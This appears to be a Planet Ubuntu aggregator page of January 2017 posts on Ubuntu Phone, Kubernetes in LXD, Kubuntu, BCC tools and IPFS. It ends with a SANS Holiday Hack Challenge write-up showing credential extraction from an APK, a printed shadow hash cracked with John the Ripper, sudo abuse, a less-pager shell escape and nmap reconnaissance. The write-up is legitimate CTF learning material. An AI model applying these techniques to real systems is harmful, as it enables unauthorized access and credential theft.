The biggest strength and weakness of Ubuntu Phone is that it’s a device without an intrinsic set of services. If you buy an Android device you get Google Services. If you buy an iPhone you get Apple services. While these can be strengths (at least in Google’s case) they are effectively a lock in to services that may or may not meet your requirements. You certainly can get Telegram or Signal for either of those, but they’re never going to be as integrated as Hangouts or iMessage. This goes throughout the device including things like music and storage as well. Ubuntu and Canonical don’t provide those services, but instead provide integration points for any of them (including Apple and Google if they wanted) to work inside an Ubuntu Phone. This means as a user you can use the services you want on your device, if you love Hangouts and Apple Maps, Ubuntu Phone is happy to be a freak with you.

Carriers are also interested in this flexibility. They’re trying to put together packages of data and services that will sell, and fetch a premium price (effectively bundling). Some they may provide themselves and some by well known providers; but by not being able to select options for those base services they have less flexibility on what they can do. Sure, Google and Apple could give them a great price or bundle, but they both realize that they don’t have to. So that effectively makes it difficult for the carriers as well as alternate service providers (e.g. Dropbox, Spotify, etc) to compete.

What I find most interesting thing about this discussion is that it is the original reason that Google bought Android. They were concerned that with Apple controlling the smartphone market they’d be in a position to damage Google’s ability to compete in services. They were right. But instead of opening it up to competition (a competition that certainly at the time and even today they’re likely to win) they decided to lock down Android with their own services. So now we see in places like China where Google services are limited there is no way for Android to win, only forks that use a different set of integrations. One has to wonder if Ubuntu Phone existed earlier whether Google would have bought Android, while Ubuntu Phone competes with Android it doesn’t pose any threat to Google’s core businesses.

It is always a failure to try and convince people to change their patterns and devices just for the sake of change. Early adopters are people who enjoy that, but not the majority of people. This means that we need to be an order of magnitude better, which is a pretty high bar to set, but one I enjoy working towards. I think that Ubuntu Phone has the fundamental DNA to win in this race.

on January 14, 2017 06:00 AM

January 13, 2017

LXD logo

Introduction

For those who haven’t heard of Kubernetes before, it’s defined by the upstream project as:

Kubernetes is an open-source system for automating deployment, scaling, and management of containerized applications.

It groups containers that make up an application into logical units for easy management and discovery. Kubernetes builds upon 15 years of experience of running production workloads at Google, combined with best-of-breed ideas and practices from the community.

It is important to note the “applications” part in there. Kubernetes deploys a set of single application containers and connects them together. Those containers will typically run a single process and so are very different from the full system containers that LXD itself provides.

This blog post will be very similar to one I published last year on running OpenStack inside a LXD container. Similarly to the OpenStack deployment, we’ll be using conjure-up to setup a number of LXD containers and eventually run the Docker containers that are used by Kubernetes.

Requirements

This post assumes you’ve got a working LXD setup, providing containers with network access and that you have at least 10GB of space for the containers to use and at least 4GB of RAM.

Outside of configuring LXD itself, you will also need to bump some kernel limits with the following commands:

sudo sysctl fs.inotify.max_user_instances=1048576  
sudo sysctl fs.inotify.max_queued_events=1048576  
sudo sysctl fs.inotify.max_user_watches=1048576  
sudo sysctl vm.max_map_count=262144

Setting up the container

Similarly to OpenStack, the conjure-up deployed version of Kubernetes expects a lot more privileges and resource access than LXD would typically provide. As a result, we have to create a privileged container, with nesting enabled and with AppArmor disabled.

This means that not very much of LXD’s security features will still be in effect on this container. Depending on how you feel about this, you may choose to run this on a different machine.

Note that all of this however remains better than instructions that would have you install everything directly on your host machine. If only by making it very easy to remove it all in the end.

lxc launch ubuntu:16.04 kubernetes -c security.privileged=true -c security.nesting=true -c linux.kernel_modules=ip_tables,ip6_tables,netlink_diag,nf_nat,overlay -c raw.lxc=lxc.aa_profile=unconfined
lxc config device add kubernetes mem unix-char path=/dev/mem

Then we need to add a couple of PPAs and install conjure-up, the deployment tool we’ll use to get Kubernetes going.

lxc exec kubernetes -- apt-add-repository ppa:conjure-up/next -y
lxc exec kubernetes -- apt-add-repository ppa:juju/stable -y
lxc exec kubernetes -- apt update
lxc exec kubernetes -- apt dist-upgrade -y
lxc exec kubernetes -- apt install conjure-up -y

And the last setup step is to configure LXD networking inside the container.
Answer with the default for all questions, except for:

  • Use the “dir” storage backend (“zfs” doesn’t work in a nested container)
  • Do NOT configure IPv6 networking (conjure-up/juju don’t play well with it)
lxc exec kubernetes -- lxd init

And that’s it for the container configuration itself, now we can deploy Kubernetes!

Deploying Kubernetes with conjure-up

As mentioned earlier, we’ll be using conjure-up to deploy Kubernetes.
This is a nice, user friendly, tool that interfaces with Juju to deploy complex services.

Start it with:

lxc exec kubernetes -- sudo -u ubuntu -i conjure-up
  • Select “Kubernetes Core”
  • Then select “localhost” as the deployment target (uses LXD)
  • And hit “Deploy all remaining applications”

This will now deploy Kubernetes. The whole process can take well over an hour depending on what kind of machine you’re running this on. You’ll see all services getting a container allocated, then getting deployed and finally interconnected.

Once the deployment is done, a few post-install steps will appear. This will import some initial images, setup SSH authentication, configure networking and finally giving you the IP address of the dashboard.

Interact with your new Kubernetes

We can ask juju to deploy a new kubernetes workload, in this case 5 instances of “microbot”:

ubuntu@kubernetes:~$ juju run-action kubernetes-worker/0 microbot replicas=5
Action queued with id: 1d1e2997-5238-4b86-873c-ad79660db43f

You can then grab the service address from the Juju action output:

ubuntu@kubernetes:~$ juju show-action-output 1d1e2997-5238-4b86-873c-ad79660db43f
results:
 address: microbot.10.97.218.226.xip.io
status: completed
timing:
 completed: 2017-01-13 10:26:14 +0000 UTC
 enqueued: 2017-01-13 10:26:11 +0000 UTC
 started: 2017-01-13 10:26:12 +0000 UTC

Now actually using the Kubernetes tools, we can check the state of our new pods:

ubuntu@kubernetes:~$ ./kubectl get pods
NAME READY STATUS RESTARTS AGE
default-http-backend-w9nr3 1/1 Running 0 21m
microbot-1855935831-cn4bs 0/1 ContainerCreating 0 18s
microbot-1855935831-dh70k 0/1 ContainerCreating 0 18s
microbot-1855935831-fqwjp 0/1 ContainerCreating 0 18s
microbot-1855935831-ksmmp 0/1 ContainerCreating 0 18s
microbot-1855935831-mfvst 1/1 Running 0 18s
nginx-ingress-controller-bj5gh 1/1 Running 0 21m

After a little while, you’ll see everything’s running:

ubuntu@kubernetes:~$ ./kubectl get pods
NAME READY STATUS RESTARTS AGE
default-http-backend-w9nr3 1/1 Running 0 23m
microbot-1855935831-cn4bs 1/1 Running 0 2m
microbot-1855935831-dh70k 1/1 Running 0 2m
microbot-1855935831-fqwjp 1/1 Running 0 2m
microbot-1855935831-ksmmp 1/1 Running 0 2m
microbot-1855935831-mfvst 1/1 Running 0 2m
nginx-ingress-controller-bj5gh 1/1 Running 0 23m

At which point, you can hit the service URL with:

ubuntu@kubernetes:~$ curl -s http://microbot.10.97.218.226.xip.io | grep hostname
 <p class="centered">Container hostname: microbot-1855935831-fqwjp</p>

Running this multiple times will show you different container hostnames as you get load balanced between one of those 5 new instances.

Conclusion

Similar to OpenStack, conjure-up combined with LXD makes it very easy to deploy rather complex big software, very easily and in a very self-contained way.

This isn’t the kind of setup you’d want to run in a production environment, but it’s great for developers, demos and whoever wants to try those technologies without investing into hardware.

Extra information

The conjure-up website can be found at: http://conjure-up.io
The Juju website can be found at: http://www.ubuntu.com/cloud/juju

The main LXD website is at: https://linuxcontainers.org/lxd
Development happens on Github at: https://github.com/lxc/lxd
Mailing-list support happens on: https://lists.linuxcontainers.org
IRC support happens in: #lxcontainers on irc.freenode.net
Try LXD online: https://linuxcontainers.org/lxd/try-it

on January 13, 2017 10:35 AM

January 10, 2017

Over the past few months our team has been working real hard on the Canonical Distribution of Kubernetes. This is a pure-upstream distribution of k8s with our community’s operational expertise bundled in.

It means that we can use one set of operational code to get the same deployment on GCE, AWS, Azure, Joyent, OpenStack, and Bare Metal.

Like most young distributed systems, Kubernetes isn’t exactly famous for it’s ease of use, though there has been tremendous progress over the past 12 months. Our documentation on Kubernetes was nearly non-existent and it became obvious that we had to dive in there and bust it out. I’ve spent some time fixing it up and it’s been recently merged. 

You can find the Official Ubuntu Guides in the “Create a cluster” section. We’re taking what I call a “sig-cluster-lifecycle” approach to this documentation – the pages are organized into lifecycle topics based on what an operator would do. So “Backups”, or “Upgrades” instead one big page with sections. This will allow us to grow each section based on the expertise we learn on k8s for that given task. 

Over the past few months (and hopefully for Kubernetes 1.6) we will slowly be phasing out the documentation on our individual charm and layer pages to reduce duplication and move to a pure upstream workflow. 

On behalf of our team we hope you enjoy Kubernetes, and if you’re running into issues please let us know or you can find us in the Kubernetes slack channels.

on January 10, 2017 07:34 PM

Welcome to the Ubuntu Weekly Newsletter. This is issue #494 for the week January 2 – 8, 2017, and the full version is available here.

In this issue we cover:

The issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Paul White
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution 3.0 License BY SA Creative Commons License

on January 10, 2017 04:06 PM

January 09, 2017

The Kubuntu Team announces the availability of Plasma 5.8.4 and KDE Frameworks 5.8.0 on Kubuntu 16.04 (Xenial) and 16.10 (Yakkety) though our Backports PPA.

Plasma 5.8.4 Announcement:
https://www.kde.org/announcements/plasma-5.8.4.php
How to get the update (in the commandline):

  1. sudo apt-add-repository ppa:kubuntu-ppa/backports
  2. sudo apt update
  3. sudo apt full-upgrade -y

If you have been testing this upgrade by using the backports-landing PPA, please remove it first before doing the upgrade to backports. Do this in the commandline:

sudo apt-add-repository --remove ppa:kubuntu-ppa/backports-landing

Please report any bugs you find on Launchpad (for packaging problems) and http://bugs.kde.org for bugs in KDE software.

on January 09, 2017 08:01 PM

January 06, 2017

Happy new year Ubunteros and Ubunteras!

If you have been following our testing days, you will know by now that our intention is to get more people contributing to Ubuntu and free software projects, and to help them getting started through testing and related tasks. So, we will be making frequent calls for testing where you can contribute and learn. Educational AND fun ^_^

To start the year, I would like to invite you to test the IPFS candidate snap. IPFS is a really interesting free project for distributed storage. You can read more about it and watch a demo in the IPFS website.

We have pushed a nice snap with their latest stable version to the candidate channel in the store. But before we publish it to the stable channel we would like to get more people testing it.

You can get a clean and safe environment to test following some of the guides you'll find on the summaries of the past testing days.

Or, if you want to use your current system, you can just do:

$ sudo snap install ipfs --candidate

I have written a gist with a simple guide to get started testing it

If you finish that successfully and still have more time, or are curious about ipfs, please continue with an exploratory testing session. The idea here is just to execute random commands, try unusual inputs and just play around.

You can get ideas from the IPFS docs.

When you are done, please send me an email with your results and any comments. And if you get stuck or have any kind of question, please don't hesitate to ask. Remember that we welcome everybody.

on January 06, 2017 03:58 PM

January 05, 2017

The BPF Compiler Collection (BCC) is a toolkit for building kernel tracing tools that leverage the functionality provided by the Linux extended Berkeley Packet Filters (BPF).

BCC allows one to write BPF programs with front-ends in Python or Lua with kernel instrumentation written in C.  The instrumentation code is built into sandboxed eBPF byte code and is executed in the kernel.

The BCC github project README file provides an excellent overview and description of BCC and the various available BCC tools.  Building BCC from scratch can be a bit time consuming, however,  the good news is that the BCC tools are now available as a snap and so BCC can be quickly and easily installed just using:

 sudo snap install --devmode bcc  

There are currently over 50 BCC tools in the snap, so let's have a quick look at a few:

cachetop allows one to view the top page cache hit/miss statistics. To run this use:

 sudo bcc.cachetop  



The funccount tool allows one to count the number of times specific functions get called.  For example, to see how many kernel functions with the name starting with "do_" get called per second one can use:

 sudo bcc.funccount "do_*" -i 1  


To see how to use all the options in this tool, use the -h option:

 sudo bcc.funccount -h  

I've found the funccount tool to be especially useful to check on kernel activity by checking on hits on specific function names.

The slabratetop tool is useful to see the active kernel SLAB/SLUB memory allocation rates:

 sudo bcc.slabratetop  


If you want to see which process is opening specific files, one can snoop on open system calls use the opensnoop tool:

 sudo bcc.opensnoop -T


Hopefully this will give you a taste of the useful tools that are available in BCC (I have barely scratched the surface in this article).  I recommend installing the snap and giving it a try.

As it stands,BCC provides a useful mechanism to develop BPF tracing tools and I look forward to regularly updating the BCC snap as more tools are added to BCC. Kudos to Brendan Gregg for BCC!
on January 05, 2017 03:21 PM

Show Audio Feeds

MP3: http://feeds.feedburner.com/KubuntuPodcast-mp3

OGG: http://feeds.feedburner.com/KubuntuPodcast-ogg

Pocket Casts links
pc_icon_full  OGG
pc_icon_full  MP3

Show Hosts

Ovidiu-Florin Bogdan

Rick Timmis

Aaron Honeycutt (Video/Audio Podcast Production)

Intro

What have we (the hosts) been doing ?

  • Aaron
    • Kicking Rick’s merges to the curb
    • Kubuntu Manual / Documentation
  • Rick
    • Kubuntu Party
    • Kubuntu Dojo
    • Kubuntu Manual / Documentation
  • Ovidiu
    • Projects
    • Dockerising Open Source Applications (ReviewBoard, AgileFant, FixMyStreet)
    • Adding Images to Feedburner

      Sponsor: Big Blue Button

      Big Blue Button logo

Those of you that have attended the Kubuntu parties, will have seen our Big Blue Button conference and online education service.

Video, Audio, Presentation, Screenshare and whiteboard tools.

We are very grateful to Fred Dixon and the team at BigBlueButton.org go check out their project.

Kubuntu News

Elevator Picks

Identify, install and review one app each from the Discover software center and do a short screen demo and review.

In Focus

Sponsor: Linode

Linode-logo


Linode, an awesome VPS with super fast SSD’s, Data connections, and top notch support. We have worked out a sponsorship for a server to build packages quicker and get to our users faster.

Instantly deploy and get a Linode Cloud Server up and running in seconds with your choice of Linux distro, resources, and node location.

  • SSD Storage
  • 40Gbit Network
  • Intel E5 Processors

BIG SHOUT OUT to Linode for working with us!

Kubuntu Developer Feedback

  • Linode Server – 1 x LXD Containers for other to use
    • 1 Container being used by one of the packagers
    • 2 A KCI Slave node
    • With this resource we can build one tree level dependency at once, which is around 100 packages, which takes around 1 hr on average.
    • There is also enough capacity left that we can provide additional containers for Ninja’s to use packaging.
  • For Yakkety, we now have QT 5.6.1, and we got Frameworks and Plasma 5.7.2 and for applications 16.04.3 almost done for Yakkety, and were looking for testers. The team are looking forward to applications 16.08, just hoping for an upstream release to get the PIM packages.
  • For Xenial Plasma 5.7.2 has move a little further forward, but there is much to be done in backports to achieve this.
  • Kubuntu CI System – Yofel has been working hard on improving the CI system, in addition to adding Slave Nodes, thanks to Linode too.
    • The next stage was to get the Build jobs in order, this has meant we have dropped 32bit builds from the CI, but we’ll continue to provide x86 32bit builds of Kubuntu.Focusing on only 64bit builds has resolved many of errors and fails.
    • They did run into an interesting error, where the Linode slave was so powerful it tried to open 20 concurrent connections to the KDE Git repo, and was promptly closed off by the 5 connection limit. A nice problem to have.
  • Yofel will continue to work on the Stable CI builds, by getting a set of working configurations. The move back to Launchpad brings many benefits but right now its created a lot of challenges, that the team are working through.
  • 2 additional Ninja’s have been added to the Team:
    • Rik Mills
    • Simon Quigly
  • Clivejo put a big shout out to the 2 new Ninja’s, many thanks for excellent work and effort.
  • As always we’re desperate for daily build and beta builds of Yakkety
  • Bug Crush Sprint required http://qa.kubuntu.co.uk/

In Show Notes

Rick doing GOOD STUFF: http://picosong.com/Dk8m/

Outro

How to contact the Kubuntu Team:

How to contact the Kubuntu Podcast Team:

on January 05, 2017 08:21 AM

Kubuntu Podcast 17

Kubuntu Podcast News

Show Audio Feeds

MP3: http://feeds.feedburner.com/KubuntuPodcast-mp3

OGG: http://feeds.feedburner.com/KubuntuPodcast-ogg

Pocket Casts links

pc_icon_full OGG

pc_icon_full MP3

Show Hosts

Ovidiu-Florin Bogdan

Rick Timmis

Aaron Honeycutt (Video/Audio Podcast Production)

Intro

What have we (the hosts) been doing ?

  • Aaron
    • Getting ready for Hurricane Matt in Florida
  • Rick
    • ???
  • Ovidiu
    • ???

Sponsor: Big Blue Button

Big Blue Button logo

Those of you that have attended the Kubuntu parties, will have seen our Big Blue Button conference and online education service.

Video, Audio, Presentation, Screenshare and whiteboard tools.

We are very grateful to Fred Dixon and the team at BigBlueButton.org go check out their project.

Kubuntu News

Elevator Picks

Identify, install and review one app each from the Discover software center and do a short screen demo and review.

In Focus

Sponsor: Linode

Linode-logo

Linode, an awesome VPS with super fast SSD’s, Data connections, and top notch support. We have worked out a sponsorship for a server to build packages quicker and get to our users faster.

Instantly deploy and get a Linode Cloud Server up and running in seconds with your choice of Linux distro, resources, and node location.

  • SSD Storage
  • 40Gbit Network
  • Intel E5 Processors

BIG SHOUT OUT to Linode for working with us!

Kubuntu Developer Feedback

  • Clive became a Kubuntu Developer!!!

Game On 

  • The Linux Gamer interview

Questions about Gaming on Linux:

  1. Who are you and what do you do?
  2. What makes a Game developer want to bring their AAA game to Linux?
  3. Has stores like Humble Bundle, Indie Gala helped Linux gaming?
  4. Are Linux graphics drivers getting better?
  5. What are your thoughts on Vulkan?

TLG YouTube: https://www.youtube.com/user/tuxreviews

TLG Patreon: https://www.patreon.com/thelinuxgamer

Listener Feedback

  • From: Snowhog @ https://www.kubuntuforums.net/

    I just want to express my thanks for all the hard work developers and testers put into the Kubuntu/KDE/Plasma projects. So few of you; so many of us, and the “us’s” always seem to want ‘more’, and tend to, more often than not, complain about what isn’t included and what isn’t working instead of praising that which is and does.

    For me, and with very few exceptions since I first started using Kubuntu in 2007, Kubuntu has simply just worked. I am constantly amazed that such a robust and feature filled operating system is available to everyone for free (free to me). The developers and testers simply don’t receive the credit and gratitude you all have earned.

    So, again, from one of the “us’s”, THANK YOU!

    Please feel free to pass this along.

Contact Us

How to contact the Kubuntu Team:

How to contact the Kubuntu Podcast Team:

on January 05, 2017 08:02 AM

Introduction

This is my second time playing the SANS holiday hack challenge. It was a lot of fun, and probably took me about 8-10 hours over a period of 2-3 days, not including this writeup. Ironically, this writeup took me longer than actually completing the challenge – which brings me to a note about some of the examples in the writeup. Please ignore any dates or timelines you might see in screengrabs and other notes – I was so engrossed in playing that I did a terrible job of documenting as I went along, so a lot of these I went back and did a 2nd time (of course, knowing the solution made it a bit easier) so I could provide the quality of writeup I was hoping to.

Most importantly, a huge shout out to all the SANS Counter Hack guys – I can only imagine how much work goes into building an educational game like this and making the challenges realistic and engrossing. I’ve built wargames & similar apps for work, but never had to build them into a story – let across a story that spans multiple years. I tip my hat to their dedication and success!

Part 1: A Most Curious Business Card

We start with the Dosis children again (I can’t read that name without thinking about DOCSIS, but I see no cable modems here…) who have found Santa’s bag and business card, signs of a struggle, but no Santa!

Looking at the business card, we see that Santa seems to be into extensive social media use. On his twitter account, we see a large number of posts (350), mostly composed of Christmas-themed words (JOY, PEACEONEARTH, etc.), but occasionally with a number of symbols in the center. At first I thought it might be some kind of encoding, so I decided to download the tweets to a file and examine them as plaintext. I did this with a bit of javascript to pull the right elements into a single file. I was about to start trying various decoding techniques when I happened to notice a pattern:

Well, perhaps the hidden message is “BUG BOUNTY”. (Question #1) (Image wrapped for readability.) I’m not sure what to do with it at this point, but perhaps it will become clear later.

Let’s switch to instagram and take a look there. The first two photos appear unremarkable, but the third one is cluttered with potential clues. One of Santa’s elves (Hermey) is apparently as good at keeping a clean desk as I am – just ask my coworkers! Fortunately they don’t Instagram shame me. :)

Using our “enhance” button from the local crime-solving TV show, we find a couple of clues.

We have a domain (or at least part of one) from an nmap report, and a filename. I wonder if they go together: https://www.northpolewonderland.com/SantaGram_4.2.zip. Indeed they do, and we have a zip file. Unzipping it, we discover it’s encrypted. Unsure what else to try, I try variations of “BUG BOUNTY” from Twitter, and it works for me. (Turns out the password is lower case, though.) Inside the zip file, we find an APK for SantaGram with SHA-1 78f950e8553765d4ccb39c30df7c437ac651d0d3. (Question #2)

Part 2: Awesome Package Konveyance

With APK in hand, we decide to start hunting for interesting artifacts inside. With a simple apktool d, we extract all the files inside, resulting in resources, smali code, and a handful of other files. Hunting for usernames and passwords, I decide to use ack (http://beyondgrep.com/), a grep-like tool with some enhanced features. A quick search with the strings username and password reveal a number of potential options. I could check manually, but well, I’m lazy. Instead, I use ack -A 5, which shows 5 lines of context after each match. Paging through these results, I spot a likely candidate:

Inside this same smali file, I find a password a few lines further down:

1
2
3
4
5
6
:try_start_0
const-string v1, "username"
const-string v2, "guest"
invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
const-string v1, "password"
const-string v2, "busyreindeer78"

Now we have a username and password pair: guest:busyreindeer78. (Question #3) Cool. I don’t know what they’re good for, but collecting credentials can always come in handy later.

An audio file is mentioned. I don’t know if it’s embedded in source, a resource by itself, or what, but I’m going to take a guess that it’s a large file. Find is useful in these cases:

1
2
3
4
5
6
7
8
9
10
11
12
13
% find . -size +100k               
./smali/android/support/v7/widget/StaggeredGridLayoutManager.smali
./smali/android/support/v7/widget/ao.smali
./smali/android/support/v7/widget/Toolbar.smali
./smali/android/support/v7/widget/LinearLayoutManager.smali
./smali/android/support/v7/a/l.smali
./smali/android/support/v4/b/s.smali
./smali/android/support/v4/widget/NestedScrollView.smali
./smali/android/support/design/widget/CoordinatorLayout.smali
./smali/com/parse/ParseObject.smali
./res/drawable/launch_screen.png
./res/drawable/demo_img.jpg
./res/raw/discombobulatedaudio1.mp3

There are quite a few more files than I expected in the relevant size range, but it’s easy to find the MP3 file in the bunch with just a glance. I guess the name of the audio file is discombobulatedaudio1.mp3. (Question #4.)

Part 3: A Fresh-Baked Holiday Pi

After running around for a while, hunting for pieces of the Cranberry Pi, I’m able to put the pieces together, and the helpful Holly Evergreen provides a link to the Cranberry Pi image.

After downloading the image, I’m able to map the partitions (using a great tool named kpartx) and mount the filesystem, then extract the password hash.

1
2
3
4
5
6
% sudo kpartx -av ./cranbian-jessie.img
add map loop3p1 (254:7): 0 129024 linear 7:3 8192
add map loop3p2 (254:8): 0 2576384 linear 7:3 137216
% sudo mount /dev/mapper/loop3p2 data
% sudo grep cranpi data/etc/shadow
cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:17140:0:99999:7:::

This is a standard Unix sha-512 hash – slow, but workable. Fortunately, Minty Candycane of Rudolph’s Red Team has helped us out there by pointing to John the Ripper and the RockYou password list. (Shout out to @iagox86 for hosting the best collection of password lists around.)

Throwing the hash up on a virtual machine with a few cores and running john with the rockyou list for a little while, we discover Santa’s top secret password: yummycookies. (Question #5) After we let Holly Evergreen know that we’ve found the password, she tells us that we’ll be able to use the terminals around the North Pole to unlock the doors. Time to head to the terminals.

Terminal: Elf House #2

The first door I ran to is Elf house #2. Opening the terminal, we’re told to find the password in the /out.pcap file, but we’re running as the user scratchy, and the user itchy owns the file. After spending some time over-thinking the problem, I run sudo -l to see if I can run anything as root or itchy and discover some various useful tools:

1
2
(itchy) NOPASSWD: /usr/sbin/tcpdump
(itchy) NOPASSWD: /usr/bin/strings

Like any good hacker, I go straight to strings and discover the first part of the password:

1
2
3
4
sudo -u itchy /usr/bin/strings /out.pcap
…
<input type="hidden" name="part1" value="santasli" />
…

I played around with tcpdump to try to extract the second part as a file, but could never get anything I was able to reconstruct into anything meaningful. I thought about trying to exfiltrate the file to my local box for wireshark, but I decided I wanted to push to solve it only with the tools I had available to me. I look at my options with tcpdump and try the -A flag (giving ASCII output) to see what I can see. Paging through it, I noticed an area where I saw the string “part2”, but only in every-other character. I gave strings another try, this time checking for little-endian UTF-16 characters:

1
2
sudo -u itchy /usr/bin/strings -e l /out.pcap
part2:ttlehelper

Putting the parts together, we have “santaslittlehelper” and we’re in!

Terminal: Workshop

The first of two doors in the workshop is up the candy-cane striped stairs.

The challenge here is simple, find the password in the deeply nested directory structure. I decided to see what files existed at all with a quick find:

1
2
3
4
5
$ find . -type f
./.bashrc
./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'/key_for_the_door.txt
./.profile
./.bash_logout

That was easy, but I suppose we need the contents. I don’t want to deal with all the special characters and directories (remember, I’m lazy) so I just let find do the work for me:

1
2
$ find . -type f -name 'key*' -exec cat {} \;
key: open_sesame

This leads us into Santa’s office, which presents us with another terminal on the back wall.

Terminal: Santa’s Office

As I said, we’re in Santa’s office with another terminal on the back wall, but no obvious door. It turns out the bookcase there is the hidden door!

Getting back to the terminal, I’m prompted with GREETINGS PROFESSOR FALKEN. Immediately, I recognize this as a line from the WOPR in the movie WarGames. After a few errant entries, I realize it wants me to dialog with it in exactly the same way as the movie. (This was a painstaking exercise in transcribing YouTube.)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
GREETINGS PROFESSOR FALKEN.
Hello.
HOW ARE YOU FEELING TODAY?
I'm fine. How are you?
EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73?
People sometimes make mistakes.
YES THEY DO. SHALL WE PLAY A GAME?
Love to. How about Global Thermonuclear War?
WOULDN'T YOU PREFER A GOOD GAME OF CHESS?
Later. Let's play Global Thermonuclear War.
FINE
,------~~v,_         _                     _--^\
 |'          \   ,__/ ||                 _/    /,_ _
/             \,/     /         ,,  _,,/^         v v-___
|                    /          |'~^                     \
\                   |         _/                     _ _/^
 \                 /         /                   ,~~^/ | 
  ^~~_       _ _   /          |          __,, _v__\   \/
      '~~,  , ~ \ \           ^~       /    ~   //
          \/     \/             \~,  ,/          
                                   ~~
   UNITED STATES                   SOVIET UNION
WHICH SIDE DO YOU WANT?
     1.    UNITED STATES
     2.    SOVIET UNION
PLEASE CHOOSE ONE: 2
AWAITING FIRST STRIKE COMMAND
-----------------------------
PLEASE LIST PRIMARY TARGETS BY
CITY AND/OR COUNTRY NAME: 
Las Vegas
LAUNCH INITIATED, HERE'S THE KEY FOR YOUR TROUBLE: 
LOOK AT THE PRETTY LIGHTS

That was painful, but not difficult. It was incredibly unforgiving when it comes to typos, even a single space would require retyping the sentence (though fortunately not the whole transaction).

Through the door, we find ourselves in “The Corridor” with another locked door, but this time, no terminal. I tried a few obvious passwords anyway, but had no luck with that.

Terminal: Workshop (Reindeer)

There’s a second door in the workshop, next to a few of Santa’s reindeer. (If anyone figures out whether reindeer really moo, please let me know…)

Find the passphrase from the wumpus. Play fair or cheat; it's up to you.

I was going to cheat, but first I wanted to get the lay of the game, so I wandered a bit and fired a few arrows, and happened to hit the wumpus – no cheating necessary! (I’m not sure if randomly playing is “playing fair”, but hacking is about what works!)

1
2
3
4
5
6
7
8
9
Move or shoot? (m-s) s 6
*thwock!* *groan* *crash*
A horrible roar fills the cave, and you realize, with a smile, that you
have slain the evil Wumpus and won the game!  You don't want to tarry for
long, however, because not only is the Wumpus famous, but the stench of
dead Wumpus is also quite well known, a stench plenty enough to slay the
mightiest adventurer at a single whiff!!
Passphrase:
WUMPUS IS MISUNDERSTOOD

Terminal: Workshop - Train Station

On the train, there’s another terminal. It proclaims to be the Train Management Console: AUTHORIZED USERS ONLY. Running a few commands, I soon discovered that BRAKEOFF works, but START requires a password which I don’t have. Looking at the HELP documentation, I noticed something odd:

1
2
3
4
5
6
Help Document for the Train
**STATUS** option will show you the current state of the train (brakes, boiler, boiler temp, coal level)
**BRAKEON** option enables the brakes.  Brakes should be enabled at every stop and while the train is not in use. 
**BRAKEOFF** option disables the brakes.  Brakes must be disabled before the **START** command will execute.
**START** option will start the train if the brake is released and the user has the correct password.
**HELP** brings you to this file.  If it's not here, this console cannot do it, unLESS you know something I don't.

It seemed strange that unLESS had the unusual capitalization, but then I realized the help document was probably being displayed with GNU less. Did that have a shell functionality, similar to vim or editors? The more-or-less universal command to start a shell is a bang (!), so I decided to give it a try, and was out into a shell. At first I thought about looking for the password (and you can discover it), but then I realized I could just run ActivateTrain directly.

It turns out the train is a time machine to 1978. (I wonder if that’s related to the guest password we found earlier – busyreindeer78. Guess we’ll find out soon.)

1978: Finding Santa

So I arrived in 1978 and quite frankly, had no idea what I should do. I still needed more NetWars challenge coins (man, what I wouldn’t give for a real-life NetWars challenge coin, but since I’ve never been to a NetWars event, my trophy case remains empty), so I decided to wander and find whatever I found. Guess what I found? Santa! He was in the DFER (Dungeon for Errant Reindeer), but could not remember how he got there.

Part 4: My Gosh… It’s Full of Holes

If we use ack again to find URLs containing “northpolewonderland.com” (which was just a bit of a guess from seeing one or two of these URLs when looking for credentails), we find a number of candidate URLs:

1
2
3
4
5
6
7
8
% ack -o "[a-z]+\.northpolewonderland\.com"
values/strings.xml
24:analytics.northpolewonderland.com
25:analytics.northpolewonderland.com
29:ads.northpolewonderland.com
32:dev.northpolewonderland.com
34:dungeon.northpolewonderland.com
35:ex.northpolewonderland.com

We can then retrieve the IP addresses for each of these hosts using our trust DNS tool dig:

1
2
3
4
5
6
% dig +short {ads,analytics,dev,dungeon,ex}.northpolewonderland.com
104.198.221.240
104.198.252.157
35.184.63.245
35.184.47.139
104.154.196.33

Taking each of these IPs to our trusty Tom Hessman, we find that each of these IPs in in scope for our testing, but are advised to keep our traffic reasonable.

analytics.northpolewonderland.com

I started by doing a quick NMAP scan of the host – it’s good to know what’s running on a machine, and sometimes you can reveal some interesting info with the default set of scripts. In fact, that turned out to be extremely handy in this particular case:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
% nmap -F -sC analytics.northpolewonderland.com
Starting Nmap 7.31 ( https://nmap.org )
Nmap scan report for analytics.northpolewonderland.com (104.198.252.157)
Host is up (0.065s latency).
rDNS record for 104.198.252.157: 157.252.198.104.bc.googleusercontent.com
Not shown: 98 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
| ssh-hostkey: 
|   1024 5d:5c:37:9c:67:c2:40:94:b0:0c:80:63:d4:ea:80:ae (DSA)
|   2048 f2:25:e1:9f:ff:fd:e3:6e:94:c6:76:fb:71:01:e3:eb (RSA)
|_  256 4c:04:e4:25:7f:a1:0b:8c:12:3c:58:32:0f:dc:51:bd (ECDSA)
443/tcp open  https
| http-git: 
|   104.198.252.157:443/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Finishing touches (style, css, etc) 
| http-title: Sprusage Usage Reporter!
|_Requested resource was login.php
| ssl-cert: Subject: commonName=analytics.northpolewonderland.com
| Subject Alternative Name: DNS:analytics.northpolewonderland.com
| Not valid before: 2016-12-07T17:35:00
|_Not valid after:  2017-03-07T17:35:00
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg: 
|_  http/1.1

